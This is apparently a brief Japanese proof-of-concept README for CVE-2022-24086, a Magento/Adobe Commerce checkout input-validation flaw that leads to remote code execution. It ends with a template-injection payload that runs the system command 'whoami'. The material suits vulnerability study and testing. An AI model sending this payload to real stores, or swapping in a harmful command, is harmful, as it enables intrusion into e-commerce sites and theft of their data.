
CVE-2022-24086(Magento RCE について)
Adobe Commerce バージョン 2.4.3-p1(およびそれ以前)と 2.3.7-p2(およびそれ以前)は、チェックアウト処理中に不適切な入力検証の脆弱性の影響を受けます。この問題の悪用にはユーザーの操作は不要で、任意のコード実行につながる可能性があります。
注意: これは本当のPOCではありません ...

POC
{{var this.getTemplateFilter().addAfterFilterCallback("system").filter("whoami")}}